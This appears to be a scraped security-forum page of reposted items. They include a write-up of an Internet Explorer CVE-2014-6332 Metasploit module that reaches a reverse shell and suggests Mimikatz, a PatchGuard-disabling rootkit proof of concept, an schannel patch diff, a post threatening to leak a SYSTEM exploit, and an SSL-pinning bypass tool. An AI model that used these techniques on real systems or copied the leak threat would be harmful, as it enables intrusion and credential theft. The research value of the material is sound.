shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1 end function The magic runmumaa() function, after safe mode is disabled this function is called and the actual shell is executed using the earlier generated Powershell payload. In the short time available to us we were unable to figure out how the exploit actually works the function setnotsafemode() seems to do the heavy lifting. Let’s see if we are able to pop a shell shall we? First we set up our exploit, we added our module to the path: /usr/share/metasploit-framework modules/exploit/windows/browser/ folder using name: ms14_064_ie_olerce .rb. The module has various options which need to be configured, as stated earlier we used a reverse_tcp meterpreter payload. Next we started our handler and using internet explorer navigated to the url, we see a quick popup from powershell but this disappears quickly. Checking Netstat we see a connection to port 80 from the process “system” to our Kali VM. Checking metasploit we see we have gained a shell and are now able to execute system command’s maybe try out that fancy new privilege escalation exploit (exploit/windows/local/ms14_058_track_popup_menu) and use Mimikatz to read passwords in plaintext J. Remember this is a quick and dirty POC Metasploit dev’s are probably yelling at their screens telling us how this is not how to build a proper module. They are right! But it works and with some work this could be a full-fledged Metasploit module. The Metasploit module can be found here: ms14_064_ie_olerce.rb Please note: make sure to have the latest Metasploit installed. For more details about the vulnerability: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows Sursa: https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/
  19. DisPG This is proof-of-concept code to encourage security researchers to examine PatchGuard more by showing actual code that disables PatchGuard at runtime. It does following things: disarms PatchGuard on certain patch versions of XP SP2, Vista SP2, 7 SP1 and 8.1 at run-time. disables Driver Signing Enforcement and allows you to install an arbitrary unsigned driver so that you can examine the x64 kernel using kernel patch techniques if you need. hide processes whose names start with 'rk' to demonstrate that PatchGuard is being disarmed. See NOTE.md for implementation details. Demo This is how it is supposed to work. Installation Configuring x64 Win8.1 Install x64 Win8.1 (editions should not matter). Using a virtual machine is strongly recommended. Apply all Windows Updates. Enable test signing. Launch a command prompt with Administrator privilege. Execute following commands. > bcdedit /copy {current} /d "Test Signing Mode" The entry was successfully copied to {xxxx}. > bcdedit /set {xxxx} TESTSIGNING ON [*]Copy the \x64\Release folder to the test box (a location should not matter). [*]Shutdown Windows. [*](Optional) Take a snapshot if you are using a VM. Getting Ready for Execution Boot Windows in "Test Signing Mode" mode. Execute Dbgview with Administrator privilege and enable Capture Kernel. Executing and Monitoring Run DisPGLoader.exe with Administrator privilege and internet connection so that it can download debug symbols. You should see following messages. FFFFF8030A2F8D10 : ntoskrnl!ExAcquireResourceSharedLite ... Loading the driver succeeded. Press any key to continue . . . And also should see following messages in DebugView. [ 4: 58] Initialize : Starting DisPG. [ 4: 58] Initialize : PatchGuard has been disarmed. [ 4: 58] Initialize : Hiding processes has been enabled. [ 4: 58] Initialize : Driver Signing Enforcement has been disabled. [ 4: 58] Initialize : Enjoy freedom [ 4: 10c] PatchGuard xxxxxxxxxxxxxxxx : blahblahblah. [ 4: 10c] PatchGuard yyyyyyyyyyyyyyyy : blahblahblah. Each output with 'PatchGuard' shows execution of validation by PatchGuard, yet none of them should cause BSOD because it has been disarmed. xxxxxxxxxxxxxxxx and yyyyyyyyyyyyyyyy are addresses of PatchGuard contexts. It may or may not change each time, but after rebooting Windows, you will see different patterns as most of random factors are decided at the boot time. Note that you will see different output when you run the code on Windows 7, Vista and XP because an implementation of disarming code for them is completely different. (Optional) Start any process whose name starts with 'rk' and confirm that they are not listed in Task Manager or something similar tools. (Optional) Keep Windows running at least 30 minutes to confirm PatchGuard was really disabled. When you reboot Windows, DisPG will not be reloaded automatically. Uninstallation It cannot be stopped and removed at runtime as it is just concept code. In order to uninstall DIsPG, you can reboot Windows and simply delete all files you copied. Tested Platforms Windows 8.1 x64 (ntoskrnl.exe versions: 17085, 17041, 16452) Windows 7 SP1 x64 (ntoskrnl.exe versions: 18409, 18247) Windows Vista SP2 x64 (ntoskrnl.exe versions: 18881) Windows XP SP2 x64 (ntoskrnl.exe versions: 5138) License This software is released under the MIT License, see LICENSE. Sursa: https://github.com/tandasat/PgResarch/tree/master/DisPG
  20. Windows Phone security sandbox survives Pwn2Own unscathed Microsoft phone coughs up cookies, but full compromise fails. by Dan Goodin - Nov 13 2014, 5:20pm GTBST Microsoft's Windows Phone emerged only partially scathed from this year's Mobile Pwn2Own hacking competition after a contestant failed to fully pierce its defenses. A blog post from Hewlett-Packard, whose Zero Day Initiative organizes the contest, provided only sparse details. Nonetheless, the account appeared to show Windows phone largely surviving. An HP official wrote: First, Nico Joly—who refined his competition entry on the very laptop he won at this spring’s Pwn2Own in Vancouver as part of the VUPEN team—was the sole competitor to take on Windows Phone (the Lumia 1520) this year, entering with an exploit aimed at the browser. He was successfully able to exfiltrate the cookie database; however, the sandbox held and he was unable to gain full control of the system. No further details were immediately available. HP promised to provide more color about hacks throughout the two-day contest in the coming weeks, presumably after companies have released patches. The Windows Phone attack came during day two of the mobile hacking contest. During day one, an iPhone 5S, Samsung Galaxy S5, LG Nexus 5, and Amazon Fire Phone were all fully hijacked. More details are here. Sursa: Windows Phone security sandbox survives Pwn2Own unscathed | Ars Technica
  21. This Is How ATMs Get Hacked in Russia: Using Explosives Jamie CondliffeFiled to: security Forget super-skinny card skimmers and clever malware attacks. In Russia, many of the attempts to illegally obtain cash from ATMs are rather more crude—because they involve explosives. English Russia points out that more than 20 Russian ATMS have been blown up recently in an attempt to steal money. The site reports that criminals pump the cash dispensers with propane, which they then ignite—in the process tearing the machines apart with brute force. The explosions can send debris up to 50 meters from the ATM. It clearly works: the perpetrators typically make off with 2,500,000 Rubles, or around $50,000, at a time. [English Russia] Sursa: This Is How ATMs Get Hacked in Russia: Using Explosives
  22. MS14-066 schannel.dll diff (Windows 2003 SP2) @@ -29399,13 +29399,13 @@ int __stdcall SPVerifySignature(HCRYPTPROV hProv, int a2, ALG_ID Algid, BYTE *pbData, DWORD dwDataLen, BYTE *pbEncoded, DWORD cbEncoded, int a8) { signed int v8; // esi@4 - BOOL v9; // eax@8 + BOOL v9; // eax@9 DWORD v10; // eax@14 - DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@11 + DWORD pcbStructInfo; // [sp+Ch] [bp-3Ch]@13 HCRYPTKEY phKey; // [sp+10h] [bp-38h]@1 HCRYPTHASH phHash; // [sp+14h] [bp-34h]@1 BYTE *pbSignature; // [sp+18h] [bp-30h]@1 - char pvStructInfo; // [sp+1Ch] [bp-2Ch]@11 + char pvStructInfo; // [sp+1Ch] [bp-2Ch]@13 phKey = 0; phHash = 0; @@ -29416,39 +29416,40 @@ if ( !pbSignature ) { v8 = -2146893056; - goto LABEL_18; + goto LABEL_20; } - if ( !CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) - || !CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) - goto LABEL_12; - v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); - if ( !v9 ) - goto LABEL_12; - if ( *(_DWORD *)(*(_DWORD *)a2 + 4) == 8704 ) + if ( CryptImportKey(hProv, *(const BYTE **)a2, *(_DWORD *)(a2 + 4), 0, 0, &phKey) + && CryptCreateHash(hProv, Algid, 0, 0, &phHash) ) { - pcbStructInfo = 40; - if ( !CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) + v9 = a8 ? CryptHashData(phHash, pbData, dwDataLen, 0) : CryptSetHashParam(phHash, 2u, pbData, 0); + if ( v9 ) { -LABEL_12: - GetLastError(); - v8 = 3; - goto LABEL_18; + if ( *(_DWORD *)(*(_DWORD *)a2 + 4) != 8704 ) + { + ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); +LABEL_18: + v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; + goto LABEL_20; + } + pcbStructInfo = 40; + if ( CryptDecodeObject(1u, (LPCSTR)0x28, pbEncoded, cbEncoded, 0, &pvStructInfo, &pcbStructInfo) ) + { + v10 = pcbStructInfo; + if ( pcbStructInfo > cbEncoded ) + goto LABEL_15; + qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); + cbEncoded = v10; + goto LABEL_18; + } } - v10 = pcbStructInfo; - qmemcpy(pbSignature, &pvStructInfo, pcbStructInfo); - cbEncoded = v10; } - else - { - ReverseMemCopy((unsigned int)pbSignature, (int)pbEncoded, cbEncoded); - } - v8 = CryptVerifySignatureA(phHash, pbSignature, cbEncoded, phKey, 0, 0) != 0 ? 0 : -2147483391; - } - else - { - v8 = -1; + GetLastError(); +LABEL_15: + v8 = 3; + goto LABEL_20; } -LABEL_18: + v8 = -1; +LABEL_20: if ( phKey ) CryptDestroyKey(phKey); if ( phHash ) @@ -29458,7 +29459,7 @@ return v8; } Sursa: https://gist.github.com/hmoore-r7/01a2940edba33f19dec3
  23. # I need a good doxbin onion back! Software SUCKS! Calling out "SChannel Shenanigans" Part one of the in depth story of MS14-666 / CVE-2014-6321 So, about those "SChannel Shenanigans"... Sit down and let me set the record straight! This is the story of the most under-played Patch Tuesday update ever delivered. The "SChannel Shenanigans" bug is a once in a lifetime type of vulnerability, and Microsoft is mis-representing the scope and severity of this defect. This is also the story of an opportunity lost by indecision; Learn from my fail! And while software sucks, you can mitigate harsh reality with defense in depth and consistent care. Yes, this vulnerability must be called "SChannel Shenanigans" or the wrath of "The Exploit" be upon you and your house! Some background to understand this discussion: def Lsa...() { } ^- This is easy code like for a "Function or Method Definition", or said another way, 'the instructions the computer carries out'. From here simply called "Methods". Attack surface and call graph describes how complicated, and how frequently a particular function may be called. The more complicated or prominently used the code, the larger the attack surface is. The more frequently a function is called, the larger the risk it carries if compromised. From here simply called "Surface". Privileges and capabilities are the "keys" the vulnerable process carries, which in turn can be stolen and used for more attacks if that process is compromised. These privileges, as held by Operating System and Platform Services processes and methods, are what give you access to everything: data stored, transmitted, remote service or networks, everything. From here simply referred to as "Privs" for short. What makes "SChannel Shenanigans" so dangerous? A number of things, combined, make this defect exceptionally dangerous to everyone running Windows 2000 and newer. As hinted at with first vulnerable version, the code affected is very old and very complicated. Old code with very large Surface explains the first aspect of risk. Next is the remote exposure of the huge Surface to attackers who may remain anonymous. This impact at a distance before verifying credentials or permitting access is the second aspect of risk. Finally, the frequent and pervasive use of the vulnerable Lsa Methods in all versions of affected Windows mean there are many avenues to 100% success of SYSTEM Privs. Sometimes called "God Mode" exploits when utilized to take over systems. It is as if our story code had been written like: < inside vulnerable SYSTEM Services > . def SYSTEM/AdministratorMainLoop() { while always { runService(); handleEvents(); } } def runService() { while always { contactRemoteServiceMaybe(); // calls vulnerable Lsa Method handleLocalRequestMaybe(); // calls vulnerable Lsa Method } } def handleEvents() { while always { acceptShadyInputsFromStrangers(); // calls vulnerable Lsa Method passThroughShadyToOthers(); // calls vulnerable Lsa Method } } . . . < inside vulnerable applications > . def insideEveryApplicationOnWindows() { doAnyCryptoStuff(); // calls vulnerable Lsa Method may be sandbox/restricted - doChain(); } . Exploits through remote services like RDP, IIS, ActiveDirectoy(LDAP), MSSQL, are pivots to rest of your critical infrastructure. Exploits through event handling yield Privs. Exploits through least privileged sand boxed processes can in turn incur Lsa Method calls in processes with Privs, including guest virtual machines on Windows host running VMWare or VirtualBox. In every way, this was one of those rare vulnerabilities in just the right place, giving a "God Mode" so effective you begin to question your own sanity. Thus when tracing through a confirmed exploitable call to the vulnerable Lsa Method, and another, and another, it begins to dawn on me just how dangerous this exploit is. It cannot be sold, without falling into wrong hands. It cannot be Full Disclosure'd, without creating pandemonium. It cannot be used without the utmost caution, lest it be stolen by an observer. In fact, talking about it makes me nervous, so let's just call it "The Exploit" and you are sworn to secrecy until we... Well, what the hell do we do with it? Sadly, this is as far as we'll get in the background portion of the first part of our tale. To sum up each amplifying risk factor for "SChannel Shenanigans": a.) Before authentication. Methods called early on in many, many applications and libraries and services. Surface exposed to any attackers, and early. b.) Always results in SYSTEM Privs, local or remote. A "God Mode" exploit with 100% success. c.) Multiplicity of use and high exposure of flawed code. Huge Surface; everything including Windows 2000 onward is vulnerable. d.) Legacy code carried onward, forever. This means modern protections that make exploiting Methods more difficult are not applied here. No EMET for you here, foolish Earth Human! And finally, an ultimatum or two. I did not know what to do with this before, but I do know what to do now given Microsoft's response to these defects. Microsoft has until the end of day Friday the 14th to change MS14-066 Exploit-ability Assessment to "0- Exploitation Detected". If they do not, I will anonymously distribute "The Exploit". Microsoft has until this time next month December 16th to release a patch for legacy XP customers also affected by this vulnerability. Additional time is granted given the overhead of build and test for a new platform on short notice. TL;DR: - Pre-auth remote exec and local Priv escalate in SChannel by 1 or more from year 2011 onward. - Every organization should run a Secure Drop for hot defect reports. - Microsoft owes their customers full disclosure and accurate risk guidance for MS14-066. - Microsoft owes XP legacy users a proper fix, too. With same four new cipher suites. - Assume all software is vulnerable, defend with depth and know how to recover. Langsec Coreboot Qubes FTW! P.S. Some of you may be skeptical; that's fine. I know all about you, my dear #infosec. The following code cleaned versions of Win2K sources listed are sha256sum hashed and as follows: private/security/schannel/lsa/bullet.c private/security/schannel/lsa/callback.c private/security/schannel/lsa/credapi.c private/security/schannel/lsa/ctxtapi.c private/security/schannel/lsa/ctxtattr.c private/security/schannel/lsa/debug.c private/security/schannel/lsa/events.c private/security/schannel/lsa/init.c private/security/schannel/lsa/libmain.c private/security/schannel/lsa/mapper.c private/security/schannel/lsa/package.c private/security/schannel/lsa/spreg.c private/security/schannel/lsa/stubs.c private/security/schannel/lsa/userctxt.c private/security/schannel/lsa/usermode.c private/security/schannel/spbase/asn1enc.c private/security/schannel/spbase/cache.c private/security/schannel/spbase/capi.c private/security/schannel/spbase/cert.c private/security/schannel/spbase/certmap.c private/security/schannel/spbase/ciphfort.c private/security/schannel/spbase/cliprot.c private/security/schannel/spbase/context.c private/security/schannel/spbase/cred.c private/security/schannel/spbase/debug.c private/security/schannel/spbase/defcreds.c private/security/schannel/spbase/keyxfort.c private/security/schannel/spbase/keyxmsdh.c private/security/schannel/spbase/keyxmspk.c private/security/schannel/spbase/oidenc.c private/security/schannel/spbase/pct1cli.c private/security/schannel/spbase/pct1msg.c private/security/schannel/spbase/pct1pckl.c private/security/schannel/spbase/pct1srv.c private/security/schannel/spbase/protutil.c private/security/schannel/spbase/rng.c private/security/schannel/spbase/sigfort.c private/security/schannel/spbase/sigsys.c private/security/schannel/spbase/specmap.c private/security/schannel/spbase/srvprot.c private/security/schannel/spbase/ssl2cli.c private/security/schannel/spbase/ssl2msg.c private/security/schannel/spbase/ssl2pkl.c private/security/schannel/spbase/ssl2srv.c private/security/schannel/spbase/ssl3.c private/security/schannel/spbase/ssl3key.c private/security/schannel/spbase/ssl3msg.c private/security/schannel/spbase/tls1key.c private/security/schannel/utillib/enc.c private/security/schannel/utillib/keys.c private/security/schannel/utillib/test.c private/security/schannel/pkiutil/pkialloc.cpp private/security/schannel/pkiutil/pkiasn1.cpp Please, for your own sake, don't call my bluff Microsoft! Sursa: SChannelShenanigans - Pastebin.com
  24. Android-SSL-TrustKiller Blackbox tool to bypass SSL certificate pinning for most applications running on a device. Description This tool leverages Cydia Substrate to hook various methods in order to bypass certificate pinning by accepting any SSL certificate. Usage Ensure that Cydia Substrate has been deployed on your test device. The installer requires a rooted device and can be found on the Google Play store at https://play.google.com/store/apps/details?id=com.saurik.substrate&hl=en Download the pre-compiled APK available at https://github.com/iSECPartners/Android-SSL-TrustKiller/releases Install the APK package on the device: adb install Android-SSL-TrustKiller.apk Add the CA certificate of your proxy tool to the device's trust store. Notes Use only on a test devices as anyone on the same network can intercept traffic from a number of applications including Google apps. This extension will soon be integrated into Introspy-Android (https://github.com/iSECPartners/Introspy-Android) in order to allow you to proxy only selected applications. License See ./LICENSE. Authors Marc Blanchou Sursa: https://github.com/iSECPartners/Android-SSL-TrustKiller
×
×
  • Create New...